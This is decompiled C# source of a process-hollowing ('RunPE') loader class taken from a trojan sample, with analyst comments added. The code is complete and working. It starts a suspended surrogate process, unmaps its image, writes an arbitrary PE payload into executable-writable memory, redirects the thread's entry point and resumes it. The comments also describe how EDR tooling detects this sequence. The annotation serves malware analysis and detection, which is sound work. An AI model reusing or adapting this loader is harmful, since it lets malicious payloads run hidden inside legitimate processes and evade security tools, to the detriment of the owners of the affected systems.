// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
using System;
using System.Runtime.InteropServices;
using System.Text;

// Analyst notes (decompiler output; the `n - 1 + 1` array sizes and the
// `Convert.ToInt32((string) null, 2)` call look like VB.NET compilation artifacts).
//
// This class is a 32-bit process-hollowing ("RunPE") loader and does nothing
// else: it starts a suspended surrogate process, unmaps the surrogate's own
// image, writes the PE held in `bytes` into the surrogate at that PE's preferred
// ImageBase, patches the PEB image base and the thread's entry-point register,
// and resumes the thread. VirtualProtectEx is imported but never called.
//
// Detection / mitigation context: the sequence
//   CreateProcess(CREATE_SUSPENDED) -> GetThreadContext -> NtUnmapViewOfSection
//   -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory (headers,
//   then each section) -> SetThreadContext -> ResumeThread
// against a freshly spawned child is the canonical hollowing signature that
// EDR and ETW-based telemetry key on, and the resulting process exposes an
// in-memory image that no longer matches its on-disk file. Policies that deny
// RWX allocations in child processes, or alert on SetThreadContext following
// NtUnmapViewOfSection, break this exact code path.
public class IX
{
  // kernel32 CreateProcess (no CharSet given, so the DllImport default, ANSI,
  // applies). STARTUPINFO is passed as a raw 68-byte buffer and
  // PROCESS_INFORMATION as an array of four IntPtrs; R() fills both.
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool CreateProcess(
    string appName,
    StringBuilder commandLine,
    IntPtr procAttr,
    IntPtr thrAttr,
    [MarshalAs(UnmanagedType.Bool)] bool inherit,
    int creation,
    IntPtr env,
    string curDir,
    byte[] sInfo,
    IntPtr[] pInfo);

  // CONTEXT is modelled as a flat uint[] rather than a struct; R() sizes it
  // to 179 uints (716 bytes, the x86 CONTEXT size) and sets ContextFlags at [0].
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);

  [DllImport("kernel32")]
  private static extern bool SetThreadContext(IntPtr t, uint[] c);

  // Native (ntdll) call used to evict the surrogate's original image; returns
  // an NTSTATUS, compared against 0 (STATUS_SUCCESS) by the caller.
  [DllImport("ntdll")]
  private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

  // The buffer is a single `ref IntPtr`; R() reads exactly 4 bytes into it,
  // which only makes sense for a 32-bit target.
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool ReadProcessMemory(
    IntPtr hProc,
    IntPtr baseAddr,
    ref IntPtr bufr,
    int bufrSize,
    ref IntPtr numRead);

  [DllImport("kernel32.dll")]
  private static extern uint ResumeThread(IntPtr hThread);

  [DllImport("kernel32")]
  private static extern IntPtr VirtualAllocEx(
    IntPtr hProc,
    IntPtr addr,
    IntPtr size,
    int allocType,
    int prot);

  // Imported but unused anywhere in this class.
  [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
  private static extern bool VirtualProtectEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    IntPtr dwSize,
    uint flNewProtect,
    ref uint lpflOldProtect);

  [DllImport("kernel32.dll", SetLastError = true)]
  private static extern bool WriteProcessMemory(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    uint nSize,
    out int lpNumberOfBytesWritten);

  /// <summary>
  /// Hollows a new, suspended instance of <paramref name="surrogateProcess"/>
  /// and maps the PE image in <paramref name="bytes"/> into it, then resumes it.
  /// </summary>
  /// <param name="bytes">
  /// Raw PE32 file image. It is read at fixed DOS/NT header offsets and never
  /// validated (no MZ/PE signature check, no bounds check).
  /// </param>
  /// <param name="surrogateProcess">
  /// Command line handed to CreateProcess; this is the process whose image is
  /// replaced.
  /// </param>
  /// <returns>
  /// <c>false</c> only when an exception escaped the try block; <c>true</c>
  /// otherwise, including when CreateProcess, GetThreadContext, the read or the
  /// unmap step fail, because those branches simply fall through to the final
  /// <c>return true</c>.
  /// </returns>
  public static bool R(byte[] bytes, string surrogateProcess)
  {
    try
    {
      IntPtr zero1 = IntPtr.Zero;
      // PROCESS_INFORMATION as four pointers: [0] hProcess, [1] hThread
      // (the only two elements read below).
      IntPtr[] pInfo = new IntPtr[4];
      // STARTUPINFO (68 bytes on x86), zero-filled; its cb field is never set.
      byte[] sInfo = new byte[68];
      // DOS header e_lfanew (offset 0x3C): position of the NT headers.
      int int32 = BitConverter.ToInt32(bytes, 60);
      // IMAGE_FILE_HEADER.NumberOfSections (NT headers + 6).
      int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
      // IMAGE_OPTIONAL_HEADER32.SizeOfHeaders (NT headers + 84): number of
      // header bytes copied into the surrogate before the sections.
      IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
      // creation == 4 == CREATE_SUSPENDED: the surrogate's own code never runs.
      if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
      {
        // x86 CONTEXT as 179 uints. [0] = ContextFlags = 0x10002
        // (CONTEXT_i386 | CONTEXT_INTEGER), so only the integer registers are
        // requested from the suspended primary thread.
        uint[] numArray1 = new uint[179];
        numArray1[0] = 65538U;
        if (IX.GetThreadContext(pInfo[1], numArray1))
        {
          // Index 41 is byte offset 164, which in the x86 CONTEXT layout is Ebx;
          // on a freshly created thread Ebx carries the PEB pointer, and
          // PEB + 8 is ImageBaseAddress.
          IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
          IntPtr zero2 = IntPtr.Zero;
          IntPtr bufrSize = new IntPtr(4);
          IntPtr zero3 = IntPtr.Zero;
          // Read the surrogate's current image base (4 bytes, 32-bit only) and
          // unmap that image so its address range is free; both must succeed
          // or the rest of the hollowing is skipped (the thread is still resumed).
          if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
          {
            // OptionalHeader.ImageBase (+52) and SizeOfImage (+80) of the payload.
            IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
            IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
            // 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE; 64 = 0x40 =
            // PAGE_EXECUTE_READWRITE. Requested at the payload's preferred
            // ImageBase; the returned address is not checked for IntPtr.Zero.
            IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
            int lpNumberOfBytesWritten;
            // Copy SizeOfHeaders bytes of PE headers to the new base
            // (return value ignored, as for every WriteProcessMemory below).
            IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
            // Section table begins at NT headers + 248 (PE32 NT header size),
            // one 40-byte IMAGE_SECTION_HEADER per section; loop bound is
            // NumberOfSections - 1 inclusive (VB.NET `For ... To` shape).
            int num3 = int16 - 1;
            for (int index = 0; index <= num3; ++index)
            {
              int[] dst = new int[10];
              Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
              // dst[3] = VirtualAddress, dst[4] = SizeOfRawData, dst[5] = PointerToRawData.
              // `dst[4] - 1 + 1` is SizeOfRawData (a `Dim (0 To n - 1)` artifact).
              byte[] numArray2 = new byte[dst[4] - 1 + 1];
              // Convert.ToInt32((string) null, 2) evaluates to 0: destination offset 0.
              Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
              // Destination = new base + section VirtualAddress.
              num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
              num1 = new IntPtr(numArray2.Length);
              IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
            }
            // Overwrite PEB.ImageBaseAddress (PEB + 8) with the new base so the
            // surrogate reports the payload as its image.
            num2 = new IntPtr((long) numArray1[41] + 8L);
            num1 = new IntPtr(4);
            IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
            // Index 44 is byte offset 176 = CONTEXT.Eax, which a suspended
            // primary thread uses as its start address: point it at
            // new base + OptionalHeader.AddressOfEntryPoint (+40).
            numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
            // Result not checked.
            IX.SetThreadContext(pInfo[1], numArray1);
          }
        }
        // Resumed whenever CreateProcess succeeded, even if the read/unmap or
        // context update failed, so a partially patched surrogate may run.
        int num = (int) IX.ResumeThread(pInfo[1]);
      }
    }
    catch
    {
      // Every failure mode (out-of-range header offsets, marshalling errors,
      // access denied on the child) is swallowed; the caller only sees `false`.
      return false;
    }
    return true;
  }
}